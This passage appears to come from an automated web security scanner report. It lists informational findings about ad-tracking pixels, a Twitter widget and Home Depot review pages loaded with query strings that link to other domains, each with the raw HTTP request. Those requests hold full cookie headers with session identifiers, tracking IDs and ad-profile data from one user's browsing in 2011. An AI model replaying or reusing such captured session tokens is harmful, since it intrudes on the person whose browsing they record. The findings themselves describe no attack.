<li class="hat_drop_item" id="hat_more0"><a href="http://bigcharts.marketwatch.com/">Big Charts</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more1"><a href="http://vse.marketwatch.com/Game/Homepage.aspx">Virtual Stock Exchange</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more8"><a href="http://www.wsjradio.com">WSJ Radio</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more9"><a href="http://www.efinancialnews.com/">Financial News</a>
...[SNIP]...
<li class="hat_drop_item lifestyleItem" id="hat_more11"><a href="http://www.wsjwine.com/">WSJ<span>
...[SNIP]...
<b><a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">here.</a>
...[SNIP]...
</div>
<a rel="entry-content" href="http://ie8.smoothfusion.com/WallStreetJournal/view.aspx">LINKS TO ACTUAL PAGE CONTAINING WEB SLICE FUNCTIONALITY.</a>
<a rel="bookmark" target="_blank" href="http://www.wallstreetjournal.com" ></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.djreprints.com/?mod=WSJ_footer">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.wsjdigital.com/?mod=WSJ_footer">Advertising</a>
...[SNIP]...
<li><a href="http://www.wsjlocal.com/?mod=WSJ_footer" rel="nofollow">Advertise Locally</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.dj.com/?mod=WSJ_footer">About Dow Jones</a>
...[SNIP]...
<li><a href="http://www.dowjones.com/careers.asp?mod=WSJ_footer" rel="nofollow">Jobs at WSJ.com</a>
...[SNIP]...
<li id="futureLeadProgLink" style="display:none;"><a href="http://www.wsj-asia.com/flp/about.html?mod=WSJ_footer" rel="nofollow">Future Leadership Program</a>
...[SNIP]...
<li><a href="https://www.wsjsafehouse.com/">SafeHouse - Send Us Information</a>
...[SNIP]...
<li><a class="icon_facebook" href="http://www.facebook.com/wsj" target="_blank">WSJ on Facebook</a>
...[SNIP]...
<li><a href="http://wsj.iamplify.com/?mod=WSJ_footer">WSJ Digital Downloads</a>
...[SNIP]...
<li><a href="http://www.marketwatch.com/?siteid=wsj&dist=freedjsiteslink&mod=WSJ_footer">Marketwatch.com</a>
...[SNIP]...
<li><a href="http://online.barrons.com/public/main?mod=WSJ_footer">Barrons.com</a>
...[SNIP]...
<li><a href="http://www.smartmoney.com/?mod=WSJ_footer">SmartMoney.com</a>
...[SNIP]...
<li><a href="http://allthingsd.com/?reflink=DNH_EUR&mod=WSJ_footer">AllThingsD.com</a>
...[SNIP]...
<li class="fins"><a href="http://www.fins.com/?mod=WSJ_footer">FINS:</a> <a href="http://www.fins.com/finance/?mod=WSJ_footer">Finance,</a> <a href="http://it-jobs.fins.com/?mod=WSJ_footer">IT jobs,</a> <a href="http://sales-jobs.fins.com/?mod=WSJ_footer">Sales jobs</a>
...[SNIP]...
<li><a href="http://bigcharts.marketwatch.com/?mod=WSJ_footer">BigCharts.com</a>
...[SNIP]...
<li><a href="http://vse.marketwatch.com/Game/Homepage.aspx?mod=WSJ_footer">Virtual Stock Exchange</a>
...[SNIP]...
<li><a rel="nofollow" href="http://wsjradio.com?mod=WSJ_footer">WSJ Radio</a>
...[SNIP]...
<small class="acapLogo"><a href="http://the-acap.org/acap-enabled.php?mod=WSJ_footer" target="_blank"><span>
...[SNIP]...

15.67. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90

The response contains the following links to other domains:

http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=Television,NewsAndReference
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154dd07bb6adc1d6f31bfa10

Request

GET /a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308237977515&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; rdk2=0; ses2=11953^37; csi2=2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

15.68. http://pbid.pro-market.net/engine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/engine

Issue detail

The page was loaded from a URL containing a query string:

http://pbid.pro-market.net/engine?site=124915;size=1x1;mimetype=img&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=12&admeld_callback=http://tag.admeld.com/pixel

The response contains the following link to another domain:

http://tag.admeld.com/pixel?admeld_dataprovider_id=12&_seg=&external_user_id=0&expiration=7days&rnd=96107455923020

Request

GET /engine?site=124915;size=1x1;mimetype=img&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=12&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anProfile=3ndgyg+0+s0=(4m)+h=5m+1m=1+rv=(-5)+rt='ADC1D6F3'+rs=c+1f=d+4=2m1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app1.ny
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 13:10:15 GMT
Connection: close

<html><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0><IMG SRC="http://tag.admeld.com/pixel?admeld_dataprovider_id=12&_seg=&external_user_id=0&expiration=7days&rnd=96107455923020" BORDER="0" WIDTH=1 HEIGHT=1 BORDER="0"></body>
...[SNIP]...

15.69. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308661652&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C50500%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C55492%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C66267%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226814384&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1307963584+ \"4\": 1305981633}"; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuHoXcAmwCjRcvbpexYFRo0pL4G0AaMFmM8lwvF6Ikj24MPrQFkGDQYDBgsGoOjk96xA0QsNm1FE34LVnkUT/b0QpHYumujdlyxA0RkfGlBEd85nFciS+PQeWVSUY+YPFoFWZolFp1GFd31lEZjIKHFu+f93yMKzgGZcY5S48vLfO2Sjz75gFWCW2Pf0Horox1dgx+26gCI6ayNI9Nb3gwhRACr9U2M="; io_freq_p1="eJzjEuZYliDAKNFy9ul7FgNGCzDNJcyxJF6ASeLgw+vvWRQYNBgMGCwYgIKPY4AqLzRsRhG8EAoUnIsm+DQAKDjjQwOSoAjHtlCBA0wSn96jiv4IFGhlllh0GlX0VqDAREaJc8v/v0M2dnOMALPEvqf3UASPglw1d9cFFMHucKDgre8HEYIA9TM+0g=="; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="; segments_p1="eJwdkE9LAlEUxdE3i8es5oO5t6/gxxCRSLSFrpQizNxIiKOzMERX4igSuYkySQj8Q6Hg0GKCGWe652wOP867nHvuMw3tDZRp6HWYEH3+S4run+DsPsDlLfS4gc756gorHaUFSy4Mh4MTBtyH4JsjuDsE39KZ+NBmFsGHALyUeaVnWsTFdOsFb1OGZy9MU49tZbXrNd8Qu1bByIwtRgE4F0GdGE6/Df5agV+74Cqb5mKE2VrwhzuLPeyMU5K+yhvWZ5j3kF7kjQ5zbQ/8PYJueyxNvzyA/rLBcoGqC57U4fGlHf+Hr/U3/tgd9DHAwoYlUsgglzUemDguKOlxuUlY7/3rE3r4Z0xH6Lu+wopGmPwHPWx2dw=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 13:07:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 16-Jun-2011 13:07:12 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 740

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308661652&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C50500%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C55492%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C66267%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855"/>');

15.70. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308658089&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C50500%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C55492%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C66267%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1307963584+ \"4\": 1305981633}"; segments_p1="eJwdkL1qAlEUhNmf4nKrfbD0+go+hlgEJaYwlZIQ/GskSFa3MEisxFVCiE2IGhCEVVGyoKRYYTeaM9MMH7Ozc8652lbHvqVt9X4yRZeJIbpZgLcv8MMAXFpD35jx6RR9U1vqnBL0GK8l0BEL7kNo5xXOA/1mFmWjCPwTQ+eStNREifhItz6QGAeozaa1VkPXctrVSmSLXblDZMLJgxicO0O9C5xeG7z6Bn92wOUTalyFICN7zrzpYublCsiLPHa5R/BuAF13uS79Uh/6y6nzKdab8oBnHlzc8E34tfoFDR8xte4IPrFgF8MoZASHBfzfoB39GXLfdWA4s97twcY7YtNlHpF6Yv4D111xlA=="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuHoXcAmwCjRcvbpexYFRo0pL4G0AaMFmM8lwvF6Ikj24MPrQFkGDQYDBgsGoOjk96xA0QsNm1FE34LVnkUT/b0QpHYumujdlyxA0RkfGlBEd85nFciS+PQeWVSUY+YPFoFWZolFp1GFd31lEZjIKHFu+f93yMKzgGZcY5S48vLfO2Sjz75gFWCW2Pf0Horox1dgx+26gCI6ayNI9Nb3gwhRACr9U2M="; io_freq_p1="eJzjEuZYliDAKNFy9ul7FgNGCzDNJcyxJF6ASeLgw+vvWRQYNBgMGCwYgIKPY4AqLzRsRhG8EAoUnIsm+DQAKDjjQwOSoAjHtlCBA0wSn96jiv4IFGhlllh0GlX0VqDAREaJc8v/v0M2dnOMALPEvqf3UASPglw1d9cFFMHucKDgre8HEYIA9TM+0g=="; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:08:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 16-Jun-2011 12:07:49 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 740

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308658089&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C50500%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C55492%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C66267%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855"/>');

15.71. http://platform.twitter.com/widgets/follow_button.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.twitter.com
Path:	/widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:

http://platform.twitter.com/widgets/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true

The response contains the following link to another domain:

http://microformats.org/profile/hcard

Request

GET /widgets/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201
If-None-Match: "316d5be7b9bf187a7b426f66963a909a"
If-Modified-Since: Fri, 03 Jun 2011 23:19:47 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:47 GMT
ETag: "316d5be7b9bf187a7b426f66963a909a"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 30500
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Thu, 16 Jun 2011 11:22:12 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><meta charset="utf-8"><title>Twitter For Websites: Follow Button</title><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">html{margin:0
...[SNIP]...

15.72. http://reviews.homedepot.com/1999q/202642971/reviews.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reviews.homedepot.com
Path:	/1999q/202642971/reviews.htm

Issue detail

The page was loaded from a URL containing a query string:

http://reviews.homedepot.com/1999q/202642971/reviews.htm?format=embedded

The response contains the following links to other domains:

http://homedepot.ugc.bazaarvoice.com/1999q/1_0/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/1999q/3_6/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/1999q/4_0/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/1999q/5_0/5/rating.gif
http://homedepot.ugc.bazaarvoice.com/static/1999q/bazaarvoice.js
http://homedepot.ugc.bazaarvoice.com/static/1999q/more_reviews_icon.gif
http://homedepot.ugc.bazaarvoice.com/static/1999q/openRatingsHistogram.gif

Request

GET /1999q/202642971/reviews.htm?format=embedded HTTP/1.1
Host: reviews.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; s_pers=%20s_campaign%3Dno%2520value%7C1308225660593%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225660601%3B%20p_30%3DSubcategory%7C1308225660607%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223999999%3a%3bC25%5fEXP%3d1360063999%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 79281
Cache-Control: no-cache, no-store
Expires: Thu, 16 Jun 2011 11:33:22 GMT
Date: Thu, 16 Jun 2011 11:33:22 GMT
